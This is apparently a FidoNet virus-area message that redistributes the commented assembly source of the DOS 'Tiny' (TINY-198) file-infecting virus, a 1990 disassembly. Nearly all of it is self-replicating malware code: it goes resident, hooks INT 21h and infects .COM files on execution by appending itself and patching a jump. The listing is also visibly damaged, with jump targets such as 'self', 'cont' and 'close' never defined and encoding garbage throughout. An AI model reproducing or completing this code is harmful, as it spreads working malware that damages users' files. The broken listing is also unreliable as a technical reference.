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; Msg : 21 of 54
; From : MeteO 2:5030/136 Tue 09 Nov 93 09:13
; To : - *.* - Fri 11 Nov 94 08:10
; Subj : TINY_198.ASM
;.RealName: Max Ivanov
;* Kicked-up by MeteO (2:5030/136)
;* Area : VIRUS (Int: <20><><EFBFBD><EFBFBD>p<EFBFBD><70><EFBFBD><EFBFBD><EFBFBD> <20> <20><>p<EFBFBD><70><EFBFBD><EFBFBD>)
;* From : Mikko Hypponen, 2:283/718 (06 Nov 94 16:40)
;* To : Gilbert Holleman
;* Subj : TINY_198.ASM
;@RFC-Return-Receipt-To: Mikko.Hypponen@f718.n283.z2.fidonet.org
page ,132
name TINY198
title The 'Tiny' virus, version TINY-198
.radix 16
; <20> Bulgaria, 1404 Sofia, kv. "Emil Markov", bl. 26, vh. "W", et. 5, ap. 51 <20>
; <20> Telephone: Private: +359-2-586261, Office: +359-2-71401 ext. 255 <20>
; <20> <20>
; <20> The 'Tiny' Virus, version TINY-198 <20>
; <20> Disassembled by Vesselin Bontchev, July 1990 <20>
; <20> <20>
; <20> Copyright (c) Vesselin Bontchev 1989, 1990 <20>
; <20> <20>
; <20> This listing is only to be made available to virus researchers <20>
; <20> or software writers on a need-to-know basis. <20>
; The disassembly has been tested by re-assembly using MASM 5.0.
code segment
assume cs:code, ds:code
org 100
seg_60 equ 600
v_len equ v_end-v_entry
jmp v_entry ; Jump to virus code
db 'M' ; Virus signature
mov ax,4C00 ; Program terminate
int 21
call self ; Determine the start addres of the virus body
pop si
sub si,3
push ax ; Save AX (to keep programs as DISKCOPY happy)
; Check whether the virus is already in memory and just run the program if so:
mov ah,0E9
int 21
mov di,seg_60 ; Point ES:DI at 0000:0600h (i.e, segment 60h)
xor cx,cx ; ES := 0
mov es,cx
mov cl,v_len ; CX := virus length
rep movsb ; Move the virus body there
; Transfer control to cont: by PUSHing its address
; on the stack and executing RETF:
push es
mov ax,cont-v_entry+seg_60
push ax
; The original first 4 bytes of the infected file:
first4 db 0EBh, 2, 90, 90
; Resume execution from here (but already in segment 60h):
; Install new INT 21h handler and move the old one at INT 32h:
mov di,21*4
mov cl,2
mov ax,int_21-v_entry+seg_60
push word ptr es:[di] ; Get old handler's address
pop word ptr es:[di+(32-21)*4] ; Move it at INT 32h
stosw ; Install the new one
mov ax,cs
loop lp ; Loop until done
; Save the original first 4 bytes of the infected program on the stack:
push word ptr cs:[first4-v_entry+seg_60]
push word ptr cs:[first4+2-v_entry+seg_60]
mov di,offset start ; Point DI at program's start
pop word ptr [di+2] ; Restore the first 4 bytes of the program
pop word ptr [di]
pop ax ; Restore the original value of AX
push ds
push ds ; ES := DS
pop es
push di ; Push 100h on the stack
; Push the original first 4 bytes of the infected program on the stack:
push word ptr [si+first4-v_entry]
push word ptr [si+first4+2-v_entry]
jmp run_pgm ; And run the original program
int_21: ; New INT 21h handler
cmp ah,0E9 ; Memory check?
je mem_chk ; If infected, run the original program
cmp ax,4B00 ; EXEC function call?
jne end_21 ; Exit if not
push ax ; Save registers used
push bx
push cx
push dx
push di
push ds
push es
push cs ; ES := CS
pop es
mov ax,3D02 ; Open the file for both reading and writting
int 32
jc end_exec ; Exit on error
mov bx,ax ; Save the file handle in BX
mov ah,3F ; Read the first 4 bytes of the file
mov cx,4 ; 4 bytes to read
mov dx,first4-v_entry+seg_60 ; Put them in first4
mov di,dx ; Save first4 address in DI
push cs ; DS := CS
pop ds
int 32 ; Do it
; Check whether the file is already infected or is an .EXE file.
; The former contains the character `M' in its 3rd byte and
; the latter contains it either in the 0th or in the 1st byte.
push di ; Save DI
mov al,'M' ; Look for `M'
repne scasb
pop di ; Restore DI
je close ; Exit if file not suitable for infection
mov ax,4202 ; Seek to the end of file
xor cx,cx
xor dx,dx
int 32 ; Do it
push ax ; Save file length
mov dh,6 ; DX = 600h, i.e. point it at 0000:0600h
mov cl,v_len ; Length of virus body
mov ah,40 ; Append virus to file
int 32 ; Do it
mov ax,4200 ; Seek to the file beginning
xor cx,cx
xor dx,dx
int 32 ; Do it
mov dx,di ; Point DX at first4
mov al,0E9 ; Near JMP opcode
stosb ; Form the first instruction of the file
pop ax ; Restore file length in AX
sub ax,3 ; Subtract 3 (first instruction length)
stosw ; Form the JMP's opperand
mov al,'M' ; Add a `M' character to mark the file
stosb ; as infected
mov cl,4 ; Overwrite the first 4 bytes of the file
mov ah,40
int 32 ; Do it
mov ah,3E ; Close the file
int 32
pop es ; Restore used registers
pop ds
pop di
pop dx
pop cx
pop bx
pop ax
; Exit through the original INT 21h handler:
jmp dword ptr cs:[32*4]
v_end equ $ ; End of virus body
code ends
end start
;-+- FMail 0.96<EFBFBD>
; + Origin: This virus is Microsoft Windows (2:283/718)
;Yoo-hooo-oo, -!
; <20> The Me<4D>eO
;/iPATH Search PATH for include files
;--- Aidstest Null: /Kill
; * Origin: <20>PVT.ViRII<49>main<69>board<72> / Virus Research labs. (2:5030/136)